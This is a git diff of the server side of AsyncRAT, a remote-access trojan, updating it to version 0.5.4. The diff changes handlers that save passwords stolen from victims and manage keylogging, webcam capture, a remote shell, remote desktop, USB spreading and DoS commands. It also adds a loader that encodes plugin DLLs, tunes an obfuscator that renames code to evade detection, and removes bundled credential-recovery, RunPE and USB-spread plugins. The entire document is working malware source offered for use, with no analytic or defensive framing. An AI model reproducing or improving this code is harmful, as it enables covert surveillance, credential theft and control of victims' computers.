+ if (!string.IsNullOrWhiteSpace(pass))// || !string.IsNullOrWhiteSpace(cookies))
{
if (!Directory.Exists(fullPath))
Directory.CreateDirectory(fullPath);
File.WriteAllText(fullPath + "\\Password_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", pass.Replace("\n", Environment.NewLine));
- File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies.Replace("\n", Environment.NewLine));
+ //File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies.Replace("\n", Environment.NewLine));
new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple);
}
else
@@ -36,4 +36,4 @@ namespace Server.Handle_Packet
catch { }
}
}
-}
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/Server/Handle Packet/HandleRemoteDesktop.cs
index c5fbfbf..70e206f 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleRemoteDesktop.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleRemoteDesktop.cs
@@ -29,13 +29,12 @@ namespace Server.Handle_Packet
Bitmap decoded0 = RD.decoder.DecodeData(new MemoryStream(RdpStream0));
RD.rdSize = decoded0.Size;
RD.labelWait.Visible = false;
+ int Screens = Convert.ToInt32(unpack_msgpack.ForcePathObject("Screens").GetAsInteger());
+ RD.numericUpDown2.Maximum = Screens - 1;
}
byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
- int Screens = Convert.ToInt32(unpack_msgpack.ForcePathObject("Screens").GetAsInteger());
- RD.numericUpDown2.Maximum = Screens - 1;
-
if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
{
RD.pictureBox1.Image = decoded;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleShell.cs b/AsyncRAT-C#/Server/Handle Packet/HandleShell.cs
index 8468919..94c5f63 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleShell.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleShell.cs
@@ -14,9 +14,14 @@ namespace Server.Handle_Packet
{
public HandleShell(MsgPack unpack_msgpack, Clients client)
{
- FormShell shell = (FormShell)Application.OpenForms["shell:" + client.ID];
+ FormShell shell = (FormShell)Application.OpenForms["shell:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (shell != null)
{
+ if (shell.Client == null)
+ {
+ shell.Client = client;
+ shell.timer1.Enabled = true;
+ }
shell.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("ReadInput").AsString);
shell.richTextBox1.SelectionStart = shell.richTextBox1.TextLength;
shell.richTextBox1.ScrollToCaret();
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleThumbnails.cs b/AsyncRAT-C#/Server/Handle Packet/HandleThumbnails.cs
index 0d7c00f..22c17b7 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleThumbnails.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleThumbnails.cs
@@ -13,13 +13,16 @@ namespace Server.Handle_Packet
{
try
{
- if (client.LV2 == null && Program.form1.GetThumbnails.Tag == (object)"started")
+ if (client.LV2 == null)
{
client.LV2 = new ListViewItem();
client.LV2.Text = string.Format("{0}:{1}", client.TcpClient.RemoteEndPoint.ToString().Split(':')[0], client.TcpClient.LocalEndPoint.ToString().Split(':')[1]);
client.LV2.ToolTipText = client.ID;
+ client.LV2.Tag = client;
+
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
+
Program.form1.ThumbnailImageList.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
client.LV2.ImageKey = client.ID;
lock (Settings.LockListviewThumb)
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleWebcam.cs b/AsyncRAT-C#/Server/Handle Packet/HandleWebcam.cs
index ac0d049..4c1c448 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleWebcam.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleWebcam.cs
@@ -24,7 +24,7 @@ namespace Server.Handle_Packet
{
case "getWebcams":
{
- FormWebcam webcam = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("ID").AsString];
+ FormWebcam webcam = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
try
{
if (webcam != null)
@@ -40,6 +40,7 @@ namespace Server.Handle_Packet
if (webcam.comboBox1.Text == "None")
{
client.Disconnected();
+ return;
}
webcam.comboBox1.Enabled = true;
webcam.button1.Enabled = true;
@@ -59,7 +60,7 @@ namespace Server.Handle_Packet
case "capture":
{
- FormWebcam webcam = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("ID").AsString];
+ FormWebcam webcam = (FormWebcam)Application.OpenForms["Webcam:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
try
{
if (webcam != null)
@@ -81,7 +82,7 @@ namespace Server.Handle_Packet
Directory.CreateDirectory(webcam.FullPath);
webcam.pictureBox1.Image.Save(webcam.FullPath + $"\\IMG_{DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss")}.jpeg", ImageFormat.Jpeg);
}
- webcam.Text = "Webcam:" + unpack_msgpack.ForcePathObject("ID").AsString + " FPS:" + webcam.FPS + " Screen:" + image.Width + " x " + image.Height + " Size:" + Methods.BytesToString(memoryStream.Length);
+ webcam.Text = "Webcam:" + unpack_msgpack.ForcePathObject("Hwid").AsString + " FPS:" + webcam.FPS + " Screen:" + image.Width + " x " + image.Height + " Size:" + Methods.BytesToString(memoryStream.Length);
webcam.FPS = 0;
webcam.sw = Stopwatch.StartNew();
}
diff --git a/AsyncRAT-C#/Server/Handle Packet/Packet.cs b/AsyncRAT-C#/Server/Handle Packet/Packet.cs
index 2b86af3..9259968 100644
--- a/AsyncRAT-C#/Server/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/Packet.cs
@@ -1,19 +1,14 @@
using Server.Connection;
using Server.MessagePack;
-using System;
-using System.Diagnostics;
using System.Drawing;
-using Server.Forms;
-using System.Security.Cryptography;
-using System.IO;
using System.Windows.Forms;
-using Server.Algorithm;
+using System.Threading;
namespace Server.Handle_Packet
{
- public static class Packet
+ public class Packet
{
- public static void Read(object Obj)
+ public void Read(object Obj)
{
Clients client = null;
try
@@ -23,137 +18,167 @@ namespace Server.Handle_Packet
client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(data);
- if (Program.form1.InvokeRequired)
+
+ Program.form1.Invoke((MethodInvoker)(() =>
{
- Program.form1.BeginInvoke((MethodInvoker)(() =>
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
- try
- {
- switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ case "ClientInfo":
{
- case "ClientInfo":
- {
- new HandleListView().AddToListview(client, unpack_msgpack);
- break;
- }
-
- case "Ping":
- {
- new HandlePing(client, unpack_msgpack);
- break;
- }
-
- case "Logs":
- {
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} {unpack_msgpack.ForcePathObject("Message").AsString}", Color.Black);
- break;
- }
-
- case "thumbnails":
- {
- new HandleThumbnails(client, unpack_msgpack);
- break;
- }
-
- case "BotKiller":
- {
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
- break;
- }
-
- case "usb":
- {
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
- break;
- }
-
- case "recoveryPassword":
- {
- new HandleRecovery(client, unpack_msgpack);
- break;
- }
-
- case "Received":
- {
- new HandleListView().Received(client);
- break;
- }
-
- case "Error":
- {
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} error: {unpack_msgpack.ForcePathObject("Error").AsString}", Color.Red);
- break;
- }
- case "remoteDesktop":
- {
- new HandleRemoteDesktop().Capture(client, unpack_msgpack);
- break;
- }
-
- case "processManager":
- {
- new HandleProcessManager().GetProcess(client, unpack_msgpack);
- break;
- }
-
-
- case "socketDownload":
- {
- new HandleFileManager().SocketDownload(client, unpack_msgpack);
- break;
- }
-
- case "keyLogger":
- {
- new HandleKeylogger(client, unpack_msgpack);
- break;
- }
-
- case "fileManager":
- {
- new HandleFileManager().FileManager(client, unpack_msgpack);
- break;
- }
-
- case "shell":
- {
- new HandleShell(unpack_msgpack, client);
- break;
- }
-
- case "chat":
- {
- new HandleChat(unpack_msgpack, client);
- break;
- }
-
- case "reportWindow":
- {
- new HandleReportWindow(client, unpack_msgpack.ForcePathObject("Report").AsString);
- break;
- }
-
- case "webcam":
- {
- new HandleWebcam(unpack_msgpack, client);
- break;
- }
+ new HandleListView().AddToListview(client, unpack_msgpack);
+ break;
}
- }
- catch
- {
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong packet", Color.Red);
- // Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]); // todo - create a mehtod to block spammers??
- client.Disconnected();
- return;
- }
- }));
- }
+ case "Ping":
+ {
+ new HandlePing(client, unpack_msgpack);
+ break;
+ }
+
+ case "Logs":
+ {
+ new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} {unpack_msgpack.ForcePathObject("Message").AsString}", Color.Black);
+ break;
+ }
+
+ case "thumbnails":
+ {
+ client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
+ new HandleThumbnails(client, unpack_msgpack);
+ break;
+ }
+
+ case "BotKiller":
+ {
+ new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
+ break;
+ }
+
+ case "usb":
+ {
+ new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
+ break;
+ }
+
+ case "recoveryPassword":
+ {
+ new HandleRecovery(client, unpack_msgpack);
+ break;
+ }
+
+ case "Received":
+ {
+ new HandleListView().Received(client);
+ break;
+ }
+
+ case "Error":
+ {
+ new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} error: {unpack_msgpack.ForcePathObject("Error").AsString}", Color.Red);
+ break;
+ }
+ case "remoteDesktop":
+ {
+ new HandleRemoteDesktop().Capture(client, unpack_msgpack);
+ break;
+ }
+
+ case "processManager":
+ {
+ new HandleProcessManager().GetProcess(client, unpack_msgpack);
+ break;
+ }
+
+
+ case "socketDownload":
+ {
+ new HandleFileManager().SocketDownload(client, unpack_msgpack);
+ break;
+ }
+
+ case "keyLogger":
+ {
+ new HandleKeylogger(client, unpack_msgpack);
+ break;
+ }
+
+ case "fileManager":
+ {
+ new HandleFileManager().FileManager(client, unpack_msgpack);
+ break;
+ }
+
+ case "shell":
+ {
+ new HandleShell(unpack_msgpack, client);
+ break;
+ }
+
+ case "chat":
+ {
+ new HandleChat().Read(unpack_msgpack, client);
+ break;
+ }
+
+ case "chat-":
+ {
+ new HandleChat().GetClient(unpack_msgpack, client);
+ break;
+ }
+
+ case "reportWindow":
+ {
+ new HandleReportWindow(client, unpack_msgpack.ForcePathObject("Report").AsString);
+ break;
+ }
+
+ case "reportWindow-":
+ {
+ if (Settings.ReportWindow == false)
+ {
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "reportWindow";
+ packet.ForcePathObject("Option").AsString = "stop";
+ ThreadPool.QueueUserWorkItem(client.Send, packet.Encode2Bytes());
+ return;
+ }
+ lock (Settings.LockReportWindowClients)
+ Settings.ReportWindowClients.Add(client);
+ break;
+ }
+
+ case "webcam":
+ {
+ new HandleWebcam(unpack_msgpack, client);
+ break;
+ }
+
+ case "dosAdd":
+ {
+ new HandleDos().Add(client, unpack_msgpack);
+ break;
+ }
+
+ case "sendPlugin":
+ {
+ foreach (string plguins in unpack_msgpack.ForcePathObject("Hashes").AsString.Split(','))
+ {
+ client.SendPlugin(plguins.Trim());
+ }
+ break;
+ }
+
+ case "sendPlugin+":
+ {
+ client.ReSendPAlllugins();
+ break;
+ }
+ }
+ }));
}
catch
{
- client.Disconnected();
+ client?.Disconnected();
return;
}
}
diff --git a/AsyncRAT-C#/Server/Helper/Methods.cs b/AsyncRAT-C#/Server/Helper/Methods.cs
index 9840d6b..b33381e 100644
--- a/AsyncRAT-C#/Server/Helper/Methods.cs
+++ b/AsyncRAT-C#/Server/Helper/Methods.cs
@@ -1,4 +1,8 @@
-using System;
+using Microsoft.VisualBasic;
+using Server.Algorithm;
+using Server.Handle_Packet;
+using System;
+using System.Drawing;
using System.IO;
using System.Text;
using System.Threading.Tasks;
@@ -38,5 +42,20 @@ namespace Server.Helper
return randomName.ToString();
}
+
+ public static void SetPlugins()
+ {
+ try
+ {
+ foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly))
+ {
+ Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(File.ReadAllBytes(plugin))));
+ }
+ }
+ catch (Exception ex)
+ {
+ new HandleLogs().Addmsg(ex.Message, Color.Red);
+ }
+ }
}
}
diff --git a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
index 99c1497..bbe7bbe 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
+++ b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
@@ -290,36 +290,6 @@ namespace Server.Properties {
}
}
- ///
- /// Looks up a localized resource of type System.Byte[].
- ///
- internal static byte[] PluginRecovery {
- get {
- object obj = ResourceManager.GetObject("PluginRecovery", resourceCulture);
- return ((byte[])(obj));
- }
- }
-
- ///
- /// Looks up a localized resource of type System.Byte[].
- ///
- internal static byte[] PluginRunPE {
- get {
- object obj = ResourceManager.GetObject("PluginRunPE", resourceCulture);
- return ((byte[])(obj));
- }
- }
-
- ///
- /// Looks up a localized resource of type System.Byte[].
- ///
- internal static byte[] PluginUsbSpread {
- get {
- object obj = ResourceManager.GetObject("PluginUsbSpread", resourceCulture);
- return ((byte[])(obj));
- }
- }
-
///
/// Looks up a localized resource of type System.Drawing.Bitmap.
///
diff --git a/AsyncRAT-C#/Server/Properties/Resources.resx b/AsyncRAT-C#/Server/Properties/Resources.resx
index 1815859..e1b6fa3 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.resx
+++ b/AsyncRAT-C#/Server/Properties/Resources.resx
@@ -235,13 +235,4 @@
..\Resources\webcam.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\PluginRecovery.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
-
-
- ..\Resources\PluginRunPE.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
-
-
- ..\Resources\PluginUsbSpread.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
-
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/MethodsRenaming.cs b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/MethodsRenaming.cs
index c759f7b..eb264a6 100644
--- a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/MethodsRenaming.cs
+++ b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/MethodsRenaming.cs
@@ -17,7 +17,7 @@ namespace Server.RenamingObfuscation.Classes
type.Name = Utils.GenerateRandomString();
foreach (MethodDef method in type.Methods)
{
- if (!method.IsSpecialName && !method.IsConstructor && !method.HasCustomAttributes && !method.IsAbstract && !method.IsVirtual)
+ if (!method.IsSpecialName && !method.IsConstructor && !method.HasCustomAttributes && !method.IsAbstract && !method.IsVirtual && method.Name != "Main")
method.Name = Utils.GenerateRandomString();
foreach (ParamDef paramDef in method.ParamDefs)
diff --git a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/NamespacesRenaming.cs b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/NamespacesRenaming.cs
index 957eb25..6814d7e 100644
--- a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/NamespacesRenaming.cs
+++ b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/NamespacesRenaming.cs
@@ -16,6 +16,7 @@ namespace Server.RenamingObfuscation.Classes
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
+ moduleToRename.Name = Utils.GenerateRandomString();
foreach (TypeDef type in moduleToRename.GetTypes())
{
diff --git a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/Utils.cs b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/Utils.cs
index 2703e25..614def3 100644
--- a/AsyncRAT-C#/Server/RenamingObfuscation/Classes/Utils.cs
+++ b/AsyncRAT-C#/Server/RenamingObfuscation/Classes/Utils.cs
@@ -10,7 +10,7 @@ namespace Server.RenamingObfuscation.Classes
public static string GenerateRandomString()
{
var sb = new StringBuilder();
- for (int i = 1; i <= random.Next(10,30); i++)
+ for (int i = 1; i <= random.Next(10,20); i++)
{
var randomCharacterPosition = random.Next(0, alphabet.Length);
sb.Append(alphabet[randomCharacterPosition]);
@@ -19,7 +19,7 @@ namespace Server.RenamingObfuscation.Classes
}
private static readonly Random random = new Random();
- const string alphabet = "だうよたし長成に調順はんゃち赤たれま生くさ小番1で界世はてしと子の男たし院退がんゃち赤の男たれま生でムラグかずわ重体に昨で";
+ const string alphabet = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM";
}
}
diff --git a/AsyncRAT-C#/Server/Resources/PluginRecovery.dll b/AsyncRAT-C#/Server/Resources/PluginRecovery.dll
deleted file mode 100644
index 20d5bdf..0000000
Binary files a/AsyncRAT-C#/Server/Resources/PluginRecovery.dll and /dev/null differ
diff --git a/AsyncRAT-C#/Server/Resources/PluginRunPE.dll b/AsyncRAT-C#/Server/Resources/PluginRunPE.dll
deleted file mode 100644
index 47dd85e..0000000
Binary files a/AsyncRAT-C#/Server/Resources/PluginRunPE.dll and /dev/null differ
diff --git a/AsyncRAT-C#/Server/Resources/PluginUsbSpread.dll b/AsyncRAT-C#/Server/Resources/PluginUsbSpread.dll
deleted file mode 100644
index 56b9df0..0000000
Binary files a/AsyncRAT-C#/Server/Resources/PluginUsbSpread.dll and /dev/null differ
diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj
index 3079ef3..0d6f1b4 100644
--- a/AsyncRAT-C#/Server/Server.csproj
+++ b/AsyncRAT-C#/Server/Server.csproj
@@ -82,6 +82,7 @@
+
Form
@@ -186,6 +187,7 @@
FormWebcam.cs
+
@@ -323,12 +325,7 @@
-
-
-
-
-
diff --git a/AsyncRAT-C#/Server/Settings.cs b/AsyncRAT-C#/Server/Settings.cs
index c0d54e5..52e96ff 100644
--- a/AsyncRAT-C#/Server/Settings.cs
+++ b/AsyncRAT-C#/Server/Settings.cs
@@ -15,9 +15,13 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
- public static readonly string Version = "AsyncRAT 0.5.3";
+ public static readonly string Version = "AsyncRAT 0.5.4";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();
+ public static bool ReportWindow = false;
+ public static List ReportWindowClients = new List();
+ public static object LockReportWindowClients = new object();
+ public static Dictionary Plugins = new Dictionary();
}
}